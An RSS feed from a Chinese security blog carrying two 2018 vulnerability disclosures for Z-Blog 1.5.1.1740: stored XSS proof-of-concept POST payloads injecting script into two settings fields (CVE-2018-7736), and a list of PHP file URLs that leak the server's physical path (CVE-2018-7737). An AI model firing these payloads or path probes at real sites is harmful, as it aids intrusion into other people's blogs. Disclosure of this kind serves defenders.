<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>zblog &#8211; ChaBug安全</title>
	<atom:link href="/tags/zblog/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 17 May 2018 12:52:08 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Z-Blog 1.5.1.1740 XSS漏洞</title>
		<link>/web/395.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 08 Apr 2018 14:01:17 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[zblog]]></category>
		<category><![CDATA[最新版]]></category>
		<category><![CDATA[漏洞]]></category>
		<guid isPermaLink="false">/?p=324</guid>

					<description><![CDATA[CVE : CVE-2018-7736 poc: ZC_BLOG_SUBNAME参数的POC: http://localhost/z-blog/zb_system/cmd.php?...]]></description>
										<content:encoded><![CDATA[<p>CVE : CVE-2018-7736</p>
<h1>poc:</h1>
<h2><code>ZC_BLOG_SUBNAME</code>参数的POC:</h2>
<pre><code>http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&amp;token=2c7ca9a4c1c3d856e012595ca878564f</code></pre>
<p>post_data:</p>
<pre><code>ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&amp;ZC_PERMANENT_DOMAIN_ENABLE=&amp;ZC_PERMANENT_DOMAIN_WITH_ADMIN=&amp;ZC_BLOG_NAME=admin&amp;ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&amp;ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&amp;ZC_TIME_ZONE_NAME=Asia%2FShanghai&amp;ZC_BLOG_LANGUAGEPACK=zh-cn&amp;ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&amp;ZC_UPLOAD_FILESIZE=2&amp;ZC_DEBUG_MODE=&amp;ZC_GZIP_ENABLE=&amp;ZC_SYNTAXHIGHLIGHTER_ENABLE=1&amp;ZC_CLOSE_SITE=&amp;ZC_DISPLAY_COUNT=10&amp;ZC_DISPLAY_SUBCATEGORYS=1&amp;ZC_PAGEBAR_COUNT=10&amp;ZC_SEARCH_COUNT=20&amp;ZC_MANAGE_COUNT=50&amp;ZC_COMMENT_TURNOFF=&amp;ZC_COMMENT_AUDIT=&amp;ZC_COMMENT_REVERSE_ORDER=&amp;ZC_COMMENTS_DISPLAY_COUNT=100&amp;ZC_COMMENT_VERIFY_ENABLE=</code></pre>
<h2><code>ZC_UPLOAD_FILETYPE</code> 参数的POC:</h2>
<p>post_data:</p>
<pre><code>ZC_BLOG_HOST=http://localhost/z-blog/&amp;ZC_PERMANENT_DOMAIN_ENABLE=&amp;ZC_PERMANENT_DOMAIN_WITH_ADMIN=&amp;ZC_BLOG_NAME=admin&amp;ZC_BLOG_SUBNAME=Good+Luck+To+You!&amp;ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&amp;ZC_TIME_ZONE_NAME=Asia/Shanghai&amp;ZC_BLOG_LANGUAGEPACK=zh-cn&amp;ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek&quot;&gt;alert(1)ekkgh&amp;ZC_UPLOAD_FILESIZE=2&amp;ZC_DEBUG_MODE=&amp;ZC_GZIP_ENABLE=&amp;ZC_SYNTAXHIGHLIGHTER_ENABLE=1&amp;ZC_CLOSE_SITE=&amp;ZC_DISPLAY_COUNT=10&amp;ZC_DISPLAY_SUBCATEGORYS=1&amp;ZC_PAGEBAR_COUNT=10&amp;ZC_SEARCH_COUNT=20&amp;ZC_MANAGE_COUNT=50&amp;ZC_COMMENT_TURNOFF=&amp;ZC_COMMENT_AUDIT=&amp;ZC_COMMENT_REVERSE_ORDER=&amp;ZC_COMMENTS_DISPLAY_COUNT=100&amp;ZC_COMMENT_VERIFY_ENABLE=</code></pre>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Z-Blog 1.5.1.1740 物理路径泄露</title>
		<link>/web/394.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 08 Apr 2018 13:57:25 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[zblog]]></category>
		<category><![CDATA[报错]]></category>
		<category><![CDATA[最新版]]></category>
		<guid isPermaLink="false">/?p=323</guid>

					<description><![CDATA[Software Link: https://github.com/zblogcn/zblogphpVersion: 1.5.1.1740CVE : CVE-2018-7737 从...]]></description>
										<content:encoded><![CDATA[<p>Software Link: <a href="https://github.com/zblogcn/zblogphp">https://github.com/zblogcn/zblogphp</a><br />Version: 1.5.1.1740<br />CVE : CVE-2018-7737</p>
<p>从Github的<a href="https://github.com/zblogcn/zblogphp/releases">归档</a>界面中可以看到是<span class="wpcom_tag_link"><a href="/tags/%e6%9c%80%e6%96%b0%e7%89%88" title="最新版" target="_blank">最新版</a></span>的洞。</p>
<pre><code>http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php</code></pre>
<p>访问提示：</p>
<pre><code>Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
